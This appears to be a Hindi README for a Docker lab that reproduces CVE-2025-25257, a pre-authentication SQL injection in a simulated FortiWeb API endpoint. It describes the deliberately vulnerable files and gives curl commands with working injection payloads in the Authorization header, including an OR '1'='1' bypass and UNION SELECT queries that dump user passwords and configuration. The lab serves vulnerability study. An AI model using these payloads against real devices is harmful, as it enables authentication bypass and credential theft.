
CVE-2025-25257 के लिए पुनरुत्पादनीय Docker प्रयोगशाला, जो एक अनुकरणीय FortiWeb एंडपॉइंट पर HTTP प्राधिकरण हेडर के माध्यम से SQL इंजेक्शन बायपास और डेटा निकासी का प्रदर्शन करता है।
प्रयोग की वास्तुकला (वातावरण FortiWeb के कमजोर घटकों का अनुकरण करता है)
कमजोर एंडपॉइंट: /api/system/fabric/config
इंजेक्शन वेक्टर: HTTP हेडर Authorization: Bearer
तंत्र: प्रत्यक्ष SQL संयोजन (Python f-string)
प्रमाणीकरण: कोई नहीं (पूर्ण बाईपास)
डेटाबेस: SQLite (प्रदर्शन के लिए)
cve-2025-25257
├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md
Dockerfile: जानबूझकर कमजोर HTTP सेवा / बिना प्रमाणीकरण के शोषण योग्य API को उजागर करती है
docker-compose.yml: एक पुनरुत्पादन योग्य कमजोर सेवा को व्यवस्थित करता है / http के माध्यम से हमला करने योग्य API को उजागर करता है / प्रयोग वातावरण को अलग करता है
requirements.txt: एक स्थिर और पुनरुत्पादन योग्य वातावरण सुनिश्चित करता है
app.py: पूर्व-प्रमाणीकरण एंडपॉइंट लागू करता है / Authorization के माध्यम से उपयोगकर्ता इनपुट स्वीकार करता है / इस इनपुट को SQL क्वेरी में संयोजित करता है / प्रमाणीकरण बाईपास और डेटा निष्कर्षण की अनुमति देता है
init_db.py: एक शोषण योग्य डेटासेट तैयार करता है / प्रमाणीकरण बाईपास और डेटा एक्सफिल्ट्रेशन का स्पष्ट प्रदर्शन सक्षम करता है
payload.txt कोड निष्पादन का न्यूनतम, नियंत्रित और अवलोकनीय प्रमाण प्रदान करता है
docker-compose build
docker-compose up -d
docker-compose ps
docker-compose logs -f
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"
curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"
docker-compose down
docker-compose down -v
docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest